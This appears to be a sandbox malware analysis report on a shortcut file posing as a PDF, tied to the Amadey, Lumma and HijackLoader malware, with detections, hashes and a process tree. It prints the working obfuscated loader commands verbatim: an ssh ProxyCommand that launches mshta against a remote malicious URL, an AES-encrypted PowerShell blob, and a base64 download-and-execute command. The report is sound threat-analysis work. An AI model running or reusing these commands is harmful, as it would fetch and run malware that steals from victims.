File name:

Instruction_695-18121-002_Rev.PDF.lnk

Full analysis: https://app.any.run/tasks/11a68474-4e9a-4070-9b23-b8d244c9fc02
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: December 04, 2024, 18:51:43
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
pastebin
emmenhtal
loader
arch-exec
amadey
botnet
stealer
lumma
hijackloader
susp-powershell
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x018b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

A3CF7C78D143162733C64741467B5B90

SHA1:

2E46AE7501BF5921802C4E122FEA038332D61741

SHA256:

39FCF6143A801DE8ACBA009EF69AC4F7B533D8E1B91337547CA578F2B7117534

SSDEEP:

24:8N8PZsx/Tfff//YK/Urrt1v+/+GnWbUk9r9AAlnE3ek489+ddS9dbEQWhWUIeFIU:87TXvYKKLGnaUk9Jm3ekJ9+do9aQv5W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (RemoteSigned)

      • powershell.exe (PID: 6172)
    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 7072)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6172)
    • Known privilege escalation attack

      • dllhost.exe (PID: 5316)
    • Executing a file with an untrusted certificate

      • H9TNZ2UK9Z6ZKMWOTFB.exe (PID: 5112)
      • RstMwService.exe (PID: 4320)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4816)
    • Changes powershell execution policy (Bypass)

      • msiexec.exe (PID: 7084)
    • HIJACKLOADER has been detected (YARA)

      • H9TNZ2UK9Z6ZKMWOTFB.exe (PID: 5112)
    • Connects to the CnC server

      • explorer.exe (PID: 5696)
    • AMADEY has been detected (SURICATA)

      • explorer.exe (PID: 5696)
    • LUMMA has been detected (YARA)

      • msiexec.exe (PID: 7084)
    • EMMENHTAL loader has been detected

      • powershell.exe (PID: 6172)
  • SUSPICIOUS

    • Probably obfuscated PowerShell command line is found

      • ssh.exe (PID: 6240)
      • mshta.exe (PID: 7072)
    • Executes script without checking the security policy

      • powershell.exe (PID: 732)
      • powershell.exe (PID: 6172)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 6172)
      • mshta.exe (PID: 7072)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 732)
      • R-Viewer.exe (PID: 6432)
      • powershell.exe (PID: 4816)
    • Application launched itself

      • powershell.exe (PID: 6332)
      • powershell.exe (PID: 6172)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6172)
      • ssh.exe (PID: 6240)
      • mshta.exe (PID: 7072)
      • msiexec.exe (PID: 7084)
      • powershell.exe (PID: 6332)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 6172)
      • msiexec.exe (PID: 7084)
    • Starts application with an unusual extension

      • R-Viewer.exe (PID: 6156)
      • R-Viewer.exe (PID: 5792)
      • H9TNZ2UK9Z6ZKMWOTFB.exe (PID: 5112)
    • Starts itself from another location

      • R-Viewer.exe (PID: 6432)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 4816)
    • Executes application which crashes

      • RstMwService.exe (PID: 4320)
    • Contacting a server suspected of hosting an CnC

      • explorer.exe (PID: 5696)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 6172)
      • msiexec.exe (PID: 7084)
  • INFO

    • The executable file from the user directory is run by the Powershell process

      • R-Viewer.exe (PID: 6432)
      • RstMwService.exe (PID: 4320)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 7084)
    • Found Base64 encoded file access via PowerShell (YARA)

      • powershell.exe (PID: 4816)
    • Found Base64 encoded network access via PowerShell (YARA)

      • powershell.exe (PID: 4816)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
CommandLineArguments: -o ProxyCommand="powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']')" .
RelativePath: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Description: Adobe PDF Document
TargetFileDOSName: ssh.exe
HotKey: (none)
RunWindow: Show Minimized No Activate
IconIndex: 11
TargetFileSize: -
FileAttributes: (none)
Flags: IDList, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
159
Monitored processes
26
Malicious processes
10
Suspicious processes
5

Behavior graph

Click at the process to see the details
start ssh.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs mshta.exe #EMMENHTAL powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs r-viewer.exe r-viewer.exe no specs more.com no specs conhost.exe no specs CMSTPLUA r-viewer.exe no specs more.com no specs conhost.exe no specs #LUMMA msiexec.exe #HIJACKLOADER h9tnz2uk9z6zkmwotfb.exe no specs powershell.exe conhost.exe no specs more.com no specs conhost.exe no specs rstmwservice.exe werfault.exe no specs #AMADEY explorer.exe

Process information

PID
CMD
Path
Indicators
Parent process
6240"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']')" .C:\Windows\System32\OpenSSH\ssh.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
255
Version:
8.1.0.1
Modules
Images
c:\windows\system32\openssh\ssh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
6248\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exessh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6332powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exessh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6660"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://berb.fitnessclub-filmfanatics.com/z.mp4"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
7072"C:\WINDOWS\system32\mshta.exe" https://berb.fitnessclub-filmfanatics.com/z.mp4C:\Windows\System32\mshta.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
6172"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591E8E2D5F71F36954FA29E50B541460253DDD47F8D68ADEC9363D782DED5421500BF4FBEE25A669215CB1C1CF9C4E39B42F859E459433536EBB2907989E1A5FC589691387EDB08362925BE79E141A8B621176532558D159FD2B1181F898AA05EEB1EA07A556D6526ACFF59D0D02B5A98F70D6AD20CB5BC07B4752386DCD6CC47CB918CA4AB8B27B8CD3B4ADEE286293420BA6F189987D8E71654846F001ADDA03742803420074C99A7E173A3AF1F07E40C7289919C5405C1BF8A5353A0076DB1E95557A94F9DD0AA6F83884FFA5DE3D8C61567935876B1F332ACB612F634FCAC6BA6072C8BE5661D6B0F2A165601A8CBF9F9DF3F753391F622DB6D5EAC28EEB76EBC8DD9D2F9B58AD024D91420FB02E416BF9CB1115FA4DE78D8634C0977354A5A3528B042F835A34E3B2AA719E59E38CC1C23AE866E10F0F6A1B75704280DB282B9F28720319946E2E42C1C71CB3CE37440E9AC836574DE323A1EE86F3FE448C5BCC423F5F8511F71FAFFCFC235341AF3D1E03B2D48457B15F12ABEBCB12BBF7D97FAE4E57BBD065FE92EAE2804E5A4CB23F8F63844CC023F22B67826B6F5D371262B7CB12B4DD1866657D6802B8BA8F65FEEF4565467CC239F917D93AAF7BE92EFCF3FCDB41866DA32FA7B3920D92A5187C3071762FD5B90058D2A5886857BBBFC1641257F8DF51B742E0D36775465ED3059DF960AA9CE6EA17442B78E7D79CCCF6C68F3A5106F7FA91081B616E536F3C9CE9FABA62C617DB84DEA248D21129E121AC109AC1F445C0489236B29800278CE4C44AAD96EC5A84896CE52146759758532CF0EDAAF5543CAE8091A5D93E45B0489408B3933747118015539E6D2A113E6E38BBCFDBB0C4F67C4F3B9085DEAE9478F58BA64392AB67EEF40B9CDAE975CBB60252F0683FBCD6DA3213FDF689E2EC1960A3842A6DBF718CC1FB567208847E41ECB7196F3CEBE8DA67E076CF9A78D99615A6AC5376D392816D30EC3EE11E891E380AF759932052BDAD62EBAAC8A637E4C0D8E78C05F7A5292076253BC4CC8764E55D595B0A901D5F0B12D1A41B183C5DA19A74BF50D22AE7E3C3F2DC7F99B740ACF26474319680DD6305577E584D9E445067EAFF8A5FE2FFD6722D48DBD50DA9391B1E40040D72ACFD3BAFB31E573428D9A562C36830221B3FF269656E0404B04B67712ECD9A11BE2B987725683494DFBCE427CFD4B1BC13B39A1DB3364671E654F56583E1155DCCE223ADCADC21B4CFB556679B5F6413FA8E33733AC785B00BFA5085E98931898DBC97044D2831337E76508662A8F067D7A4BA9E9800685A75793E895A3E25CEBF048DA05042A904C68D3DB385A07DB95058B0339750373030ABBB0AFA8F5701AFEDDFF97243B2AA2B201452F0D179D0098D775594E469D720050081AE8A2D326F8DC507DA60618DF27FCA45C101E8B651BEE7BB35CAC6FC05F6D8D0260EE5937D0627215D14CD6F415DBDA14A23923355B710E74518171C7AB2FBF67F6E89936F33643ED072D9048B1F470D499E2269D10C4BDA3D2E036ACCEA500CEFE7B6EB2CAACA113FC36D16F917ED9BB4D740F7E41D660E15D2463EA1581C42EC6919DC1E0A780A804BCF0E7FC2AE44182EB42885D55707E32B6D71AA993BE51EAC6D7513934C870B45F0321715A29B15AD8202C074C26148ADE61ED65D21DA94F7EF5CB616C7CA5608F6354EE8B744187BEC5261B209A162E278E3B4F9D1972618759D7555C844659AC6967C78FF1B9CD0AC814EA9EF977A4760D79CDCF97A7761C23DA11D1A5CB64CADE2438719A27A3698D8838794C22809194A8649C262D4E425E84F154F6A45FC8194C9ACFDE794A4CE529562EB7F69BE5DD7637F7D7042943FB3B1DCD77A2754C765AEA874B32A2FDE6445315340AE7A630E204AA9CD2F73EF8E2C8C9CAACF9D1BDA533898FE02AC3F1A6E48CCCDF779D4D53DEAA17B40D403E87A70307F16A4B0EDED94522FC0B4BA5F4D69FD381C16E3D7ABE7F4FD4401920E00BD04985980FCE3FF2F4A011D067AF739ACCFF58A224C866E599F3AC5B49676E01AAC90B973C65C9F01103773D2D8C133ADBE06005041C7C109F8C66189516CBA309737FEDC751C4F604DF4693F58F66913EEE3B038035C1D378A896E499A097E3D58E2F155EF1EE0506B7B8D1A8F18A1A1A716FB7285164D8C43BC1BAA8E98F871AC05C4E24E0A7F1A3993C7169988348083581A931B0C5592E1A3CF20DBCF3863E0E76899710846AF92240621AE31CDB4920925B19B1B07C1D46518248B4D468F4DA7F5D927B04C9BE7294204DDB4652AA452003777F5A3D80EBC42403A3AD15968985046D2E4F47B912D57D5EB899EA9FA0E6694AEFEAAC0F74DF287B54DC5CBD3E3DD891ADF810B6B87075F3CF10C2453528E504E6031E48ECD4E32186B8288C916309C2F3DCFC21E4B460631C73032BBA0AA67B4862C43E4D2454A966D0EEC1D04CD5AD4CC93054B2DE87E25838794ED1F0D11F8BE4EE03D51AD54BA97622534A0116CF79240F6A875E32BEEBF8A63DB83C15492DC24402AD6F208ABC2B5D989467A41D99C8E2300B856B4F5BEFED2EBB87E453FA20A04332FE49B5D249349EB1C6F4C58D68436B04991FDC6146D4E5A4237181E91CC5FBDCD42D75F303F5FC7645670A01FBC67B3B2FB783C4BCF4531734E41CB91B3922683EAC815AC5D6BDA0DDE1F5AA1D854D3CCDB657A7BD10ABD7849EA8463695D4BF1BC5BF54D9DD96BD5C4ED2BCBC536F84874F4DE4D51A607B7F9323F3810D8F1C577884F5E3AEB489DEB99828A96B20316FC0E52F0532D61640DD20E864C91F7F9509080F57DFCDAFB9B001F39FA155ADC3CB62052E2D0B79AB0C7BC932A00900DAD44BE231A095CA9FFCAD9CB574708825CCC56E8B08BB00D88466F8F6AE6585EB08EC24FBA6457E95ACD19CB3895B9E4AFB241F1A8AEDCABBD06F61042EFD60A6C48FC87301CBF951B7C1A1FD9BD8F5A8DBD97AB57CF3D376BA65C822D9D9DA725E615BB9CAC5C3B8325C73C4DB8F8F7C4F3FCE984B1B1EADF24A839E953B914717B4761F0F37DA59CF7B7D9AB1AF204D92364E0FBF747A8CB454B34AFD4D40846BE837344A7B6C733B2FA42B4B0F96FC8FF8ED0EAFFA5F3C2DA522885C45067384');$oPMoB=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((EhNo('52786B594D45786F66546252646B4F6D')),[byte[]]::new(16)).TransformFinalBlock($mbaO,0,$mbaO.Length)); & $oPMoB.Substring(0,3) $oPMoB.Substring(186)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6164\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
732"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc IAAgACAAWwBOAEUAVAAuAHMAZQByAFYASQBDAGUAcABvAGkAbgB0AE0AYQBOAGEAZwBFAHIAXQA6ADoAUwBlAEMAdQByAEkAVAB5AFAAUgBPAFQATwBDAG8ATAAgAAkACQA9ACAACQBbAE4AZQB0AC4AcwBFAGMAdQBSAGkAdABZAHAAUgBPAFQATwBjAG8ATABUAFkAcABFAF0AOgA6AFQAbABzACwAIAAgAFsAbgBlAFQALgBzAEUAQwBVAHIASQBUAHkAUABSAE8AVABPAEMATwBMAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAxACwAIAAJAFsAbgBlAFQALgBzAGUAQwBVAFIAaQB0AHkAUABSAE8AVABPAEMATwBsAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACwAIAAJAFsAbgBlAHQALgBzAEUAQwB1AHIAaQB0AHkAcABSAG8AVABvAGMAbwBsAHQAeQBwAEUAXQA6ADoAUwBzAGwAMwAgACAAOwAgAAkAIABbAG4ARQBUAC4AUwBFAHIAVgBpAEMARQBQAG8AaQBuAFQATQBBAE4AYQBnAGUAUgBdADoAOgBTAGUAQwBVAFIAaQB0AHkAUAByAE8AdABPAGMAbwBsACAACQA9ACAACQAJACcAVABsAHMALAAgAAkAVABsAHMAMQAxACwAIAAgAAkAVABsAHMAMQAyACwAIAAJAFMAcwBsADMAJwAgACAACQA7ACAAIAAJAGkAZQB4ACgAIAAgACAASQB3AHIAIAAJAAkAKABbAGMAaABhAFIAXQAgACAACQAwAFgANgA4ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAYQBSAF0AIAAgAAkAMABYADcANAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAcgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAFIAXQAgACAACQAwAHgANwAwACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAYwBIAGEAcgBdACAAIAAJADAAWAAzAEEAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQBSAF0AIAAgAAkAMABYADIARgAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAcgBdACAAIAAJADAAWAA3ADAAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAHIAXQAgACAACQAwAHgANgAxACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAYQByAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAQwBIAEEAUgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABBAHIAXQAgACAACQAwAHgANgA1ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMABYADYAMgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAWAA2ADkAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAHgANgBFACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAQQByAF0AIAAgAAkAMABYADIARQAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAUgBdACAAIAAJADAAeAA2ADMAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAHIAXQAgACAACQAwAHgANgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMAB4ADYARAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAAyAEYAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAFgANwAyACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQByAF0AIAAgAAkAMAB4ADYAMQAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAA3ADcAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAYQByAF0AIAAgAAkAMAB4ADMAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBIAEEAcgBdACAAIAAJADAAWAA3ADYAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABBAFIAXQAgACAACQAwAFgAMwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMABYADUANgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAeAA2ADgAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABBAFIAXQAgACAACQAwAFgANwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAYQBSAF0AIAAgAAkAMABYADcAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBoAGEAcgBdACAAIAAJADAAeAA2ADIAIAAgAAkAKQApAA== C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
3508\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6432"C:\Users\admin\AppData\Local\c05faefa-d853-4462-ba71-f37c56627d5c\R-Viewer.exe"C:\Users\admin\AppData\Local\c05faefa-d853-4462-ba71-f37c56627d5c\R-Viewer.exe
powershell.exe
User:
admin
Company:
R-Tools Technology Inc.
Integrity Level:
MEDIUM
Description:
R-Viewer
Exit code:
0
Version:
1, 1, 0, 0
Modules
Images
c:\users\admin\appdata\local\c05faefa-d853-4462-ba71-f37c56627d5c\r-viewer.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
Total events
31 148
Read events
31 099
Write events
46
Delete events
3

Modification events

(PID) Process:(7072) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7072) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
